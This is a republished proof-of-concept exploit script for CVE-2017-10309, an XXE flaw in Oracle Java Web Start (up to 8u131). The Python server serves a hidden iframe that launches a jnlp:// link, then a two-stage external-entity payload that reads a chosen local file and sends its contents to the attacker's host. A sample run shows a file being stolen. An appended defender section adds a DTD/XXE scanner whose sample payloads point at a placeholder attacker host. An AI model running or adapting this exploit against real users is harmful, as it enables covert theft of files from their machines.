Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure
Source: vfocus.net  Author: mr_me  Published: 2017-10-31
#!/usr/local/bin/python
"""
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
Affected:   <= v8u131
File:       jre-8u131-windows-i586-iftw.exe
SHA1:       85f0de19845deef89cc5a29edebe5bb33023062d
Download:   http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
References: SRC-2017-0028 / CVE-2017-10309
Advisory:   http://srcincite.io/advisories/src-2017-0028/
 
Vulnerability Details:
======================
 
Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" = '"C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
This allows an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE payload can be leveraged to disclose files, cause a denial of service or trigger SSRF.
 
Notes:
======
 
- It will take a few seconds to fire.
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
 
Example:
========
 
saturn:~ mr_me$ ./poc.py
 
    Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
    mr_me 2017
 
(+) usage: ./poc.py <file>
(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
 
saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
 
    Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
    mr_me 2017
 
(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
(+) starting xxe server...
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
(!) firing webstart...
(!) downloading jnlp...
(!) downloading si.xml...
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
^C(+) shutting down the web server
saturn:~ mr_me$
"""
 
import sys
import socket
import fcntl
import struct
from random import choice
from string import lowercase
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
 
try:
    import netifaces as ni
except:
    print "(-) try 'pip install netifaces'"
    sys.exit(1)
 
class xxe(BaseHTTPRequestHandler):
 
    # stfu
    def log_message(self, format, *args):
        return
 
    def do_GET(self):
 
        if "leaked" in self.path:
            print "(+) stolen: %s" % self.path.split("?")[1]
            self.send_response(200)
            self.end_headers()
 
        elif self.path == "/":
            print "(!) firing webstart..."
            self.send_response(200)
            self.end_headers()
            message = """
            <html>
            <body>
            <iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe>
            </body>
            </html>
            """ % (ip, path)
            self.wfile.write(message)
            self.wfile.write('\n')
 
        elif "si.xml" in self.path:
            print "(!) downloading si.xml..."
            self.send_response(200)
            self.end_headers()
            message = """
            <!ENTITY %% data SYSTEM "file:///%s">
            <!ENTITY %% param1 "<!ENTITY &#x25; exfil SYSTEM 'http://%s:9090/leaked?%%data;'>">
            """ % (file, ip)
            self.wfile.write(message)
            self.wfile.write('\n')
 
        elif path in self.path:
            print "(!) downloading jnlp..."
            self.send_response(200)
            self.end_headers()
            message = """
            <?xml version="1.0" ?>
            <!DOCTYPE r [
            <!ELEMENT r ANY >
            <!ENTITY %% sp SYSTEM "http://%s:9090/si.xml">
            %%sp;
            %%param1;
            %%exfil;
            ]>
            """ % ip
            self.wfile.write(message)
            self.wfile.write('\n')
        return
 
def banner():
    return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n"""
 
if __name__ == '__main__':
 
    print banner()
 
    if len(sys.argv) != 2:
        print "(+) usage: %s <file>" % sys.argv[0]
        print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
        sys.exit(1)
 
    file = sys.argv[1]
 
    # randomize in case we change payloads and the browser caches the old one
    path  = "".join(choice(lowercase) for i in range(10))
    path += ".jnlp"
 
    # interfaces
    ints = ""
    for i in ni.interfaces(): ints += "%s, " % i
    interface = raw_input("(+) select your interface: %s: " % ints[:-2])
 
    # get the ip from the interface
    try:
        ip = ni.ifaddresses(interface)[2][0]['addr']
    except:
        print "(-) no ip address associated with that interface!"
        sys.exit(1)
    print "jnlp://%s:9090/%s" % (ip, path)
    try:
        server = HTTPServer(('0.0.0.0', 9090), xxe)
        print '(+) starting xxe server...'
        print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
        server.serve_forever()
 
    except KeyboardInterrupt:
        print '(+) shutting down the web server'
        server.socket.close()
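
A defender-side complement to the PoC above, added here and not part of mr_me's script: a pre-scan that flags the DTD constructs this two-stage payload relies on before a JNLP file is handed to an XML parser. The sample documents are constructed for this example and only mirror the shape of the PoC's jnlp and si.xml responses; the host `attacker.invalid` is a placeholder.

```python
import re
from urllib.parse import urlsplit

# Constructed sample inputs (not from the PoC): a legitimate launch file, and the
# two stages of the XXE chain with the attacker host replaced by a placeholder.
BENIGN = ('<?xml version="1.0"?><jnlp spec="1.0+" codebase="https://example.invalid/">'
          '<information><title>Example</title></information></jnlp>')
# Stage 1, fetched via the jnlp:// handler.  There is no <jnlp> root element at all:
# the chain fires during DTD processing, so a filter that waits for a parse is too late.
STAGE1 = """<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker.invalid:9090/si.xml">
%sp;
%param1;
%exfil;
]>
"""
# Stage 2: the external DTD that declares the file read and the exfil URL.
STAGE2 = """<!ENTITY % data SYSTEM "file:///C:/Program Files/Java/jre1.8.0_131/README.txt">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.invalid:9090/leaked?%data;'>">
"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)  # XML is case-sensitive; be lenient anyway
ENTITY_RE = re.compile(  # SYSTEM (external) declarations or quoted internal values; PUBLIC ids not handled
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[A-Za-z_:][\w.\-:]*)\s+"
    r"(?:SYSTEM\s+(?P<q1>['\"])(?P<uri>.*?)(?P=q1)|(?P<q2>['\"])(?P<value>.*?)(?P=q2))",
    re.DOTALL,
)
PE_REF_RE = re.compile(r"%([A-Za-z_:][\w.\-:]*);")  # %name; parameter entity reference


def scan_jnlp(text):
    """Return a list of findings; an empty list means no DTD/XXE constructs were seen."""
    findings = []
    if DOCTYPE_RE.search(text):
        findings.append("doctype: DTD present (JNLP never needs one; reject)")
    for m in ENTITY_RE.finditer(text):
        kind = "parameter" if m.group("param") else "general"
        if m.group("uri") is not None:  # SYSTEM entity: the parser would fetch this URI
            scheme = urlsplit(m.group("uri")).scheme or "relative"
            findings.append("external %s entity %s: scheme %s" % (kind, m.group("name"), scheme))
        elif "<!ENTITY" in m.group("value") or "&#x25;" in m.group("value").lower():
            # A declaration smuggled inside a value (&#x25; standing in for '%') is how
            # stage 2 builds the exfil entity around the stolen file content.
            findings.append("internal %s entity %s: nested entity declaration" % (kind, m.group("name")))
    refs = sorted(set(PE_REF_RE.findall(text)))
    if refs:
        findings.append("parameter entity references: " + ", ".join(refs))
    return findings
```

Calling `scan_jnlp` on the three constants returns an empty list for the benign file and flags both stages; at a proxy or mail gateway the first finding alone (any DOCTYPE in a .jnlp) is enough to drop the file.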
 